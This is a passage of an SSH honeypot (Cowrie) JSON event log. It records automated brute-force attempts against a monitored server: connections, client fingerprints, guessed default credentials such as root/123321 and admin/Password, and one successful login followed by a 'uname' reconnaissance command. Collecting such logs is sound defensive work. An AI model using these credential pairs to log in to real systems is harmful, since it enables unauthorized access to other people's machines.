.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:00.133100Z","src_ip":"212.227.125.160","session":"b769db0b2ffb"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:00.283694Z","src_ip":"212.227.125.160","session":"b769db0b2ffb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:01.336263Z","src_ip":"212.227.125.160","session":"b769db0b2ffb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46246,"dst_ip":"1.2.3.4","dst_port":22,"session":"beb958db984b","protocol":"ssh","message":"New connection: 212.227.125.160:46246 (1.2.3.4:22) [session: beb958db984b]","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.365096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.372404Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.422230Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.619200Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:03:05.741335Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.742077Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.793900Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:05.795034Z","src_ip":"212.227.125.160","session":"beb958db984b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41632,"dst_ip":"1.2.3.4","dst_port":22,"session":"be957a2af140","protocol":"ssh","message":"New connection: 212.227.125.160:41632 (1.2.3.4:22) [session: be957a2af140]","sensor":"my-vps","timestamp":"2025-08-26T22:03:10.969303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:10.969977Z","src_ip":"212.227.125.160","session":"be957a2af140"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:11.021188Z","src_ip":"212.227.125.160","session":"be957a2af140"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:11.175981Z","src_ip":"212.227.125.160","session":"be957a2af140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ebb227bba33","protocol":"ssh","message":"New connection: 212.227.125.160:6102 (1.2.3.4:22) [session: 2ebb227bba33]","sensor":"my-vps","timestamp":"2025-08-26T22:03:11.768547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T22:03:11.812505Z","src_ip":"212.227.125.160","session":"2ebb227bba33"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T22:03:11.885915Z","src_ip":"212.227.125.160","session":"2ebb227bba33"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:12.238438Z","src_ip":"212.227.125.160","session":"be957a2af140"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T22:03:12.854876Z","src_ip":"212.227.125.160","session":"2ebb227bba33"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:12.856372Z","src_ip":"212.227.125.160","session":"2ebb227bba33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37016,"dst_ip":"1.2.3.4","dst_port":22,"session":"7889967330c5","protocol":"ssh","message":"New connection: 212.227.125.160:37016 (1.2.3.4:22) [session: 7889967330c5]","sensor":"my-vps","timestamp":"2025-08-26T22:03:16.176380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:16.191952Z","src_ip":"212.227.125.160","session":"7889967330c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:16.237524Z","src_ip":"212.227.125.160","session":"7889967330c5"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:17.938522Z","src_ip":"212.227.125.160","session":"7889967330c5"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:19.308750Z","src_ip":"212.227.125.160","session":"7889967330c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60630,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c997864c0ea","protocol":"ssh","message":"New connection: 212.227.125.160:60630 (1.2.3.4:22) [session: 1c997864c0ea]","sensor":"my-vps","timestamp":"2025-08-26T22:03:22.858144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:22.865122Z","src_ip":"212.227.125.160","session":"1c997864c0ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:22.909896Z","src_ip":"212.227.125.160","session":"1c997864c0ea"}
{"eventid":"cowrie.login.failed","username":"selvananthi","password":"selvananthi","message":"login attempt [selvananthi/selvananthi] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:23.115261Z","src_ip":"212.227.125.160","session":"1c997864c0ea"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:24.318835Z","src_ip":"212.227.125.160","session":"1c997864c0ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56774,"dst_ip":"1.2.3.4","dst_port":22,"session":"74a116438606","protocol":"ssh","message":"New connection: 212.227.235.229:56774 (1.2.3.4:22) [session: 74a116438606]","sensor":"my-vps","timestamp":"2025-08-26T22:03:24.610326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:25.699554Z","src_ip":"212.227.235.229","session":"74a116438606"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:03:25.734153Z","src_ip":"212.227.235.229","session":"74a116438606"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56020,"dst_ip":"1.2.3.4","dst_port":22,"session":"7aa5ad59f7a3","protocol":"ssh","message":"New connection: 212.227.125.160:56020 (1.2.3.4:22) [session: 7aa5ad59f7a3]","sensor":"my-vps","timestamp":"2025-08-26T22:03:28.703957Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:28.705022Z","src_ip":"212.227.125.160","session":"7aa5ad59f7a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:28.759242Z","src_ip":"212.227.125.160","session":"7aa5ad59f7a3"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:28.917831Z","src_ip":"212.227.125.160","session":"7aa5ad59f7a3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:29.979097Z","src_ip":"212.227.125.160","session":"7aa5ad59f7a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password","message":"login attempt [admin/Password] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:30.442237Z","src_ip":"212.227.235.229","session":"74a116438606"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:32.721801Z","src_ip":"212.227.235.229","session":"74a116438606"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51406,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0f2bcc7f9ec","protocol":"ssh","message":"New connection: 212.227.125.160:51406 (1.2.3.4:22) [session: e0f2bcc7f9ec]","sensor":"my-vps","timestamp":"2025-08-26T22:03:34.412290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:34.421720Z","src_ip":"212.227.125.160","session":"e0f2bcc7f9ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:03:34.622610Z","src_ip":"212.227.125.160","session":"e0f2bcc7f9ec"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-26T22:03:34.970318Z","src_ip":"212.227.125.160","session":"e0f2bcc7f9ec"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:03:36.086209Z","src_ip":"212.227.125.160","session":"e0f2bcc7f9ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46800,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e6dad7cd7d8","protocol":"ssh","message":"New connection: 212.227.125.160:46800 (1.2.3.4:22) [session: 2e6dad7cd7d8]","sensor":"my-vps","timestamp":"2025-08-26T22:03:40.044505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:40.045274Z","src_ip":"212.227.125.160","session":"2e6dad7cd7d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"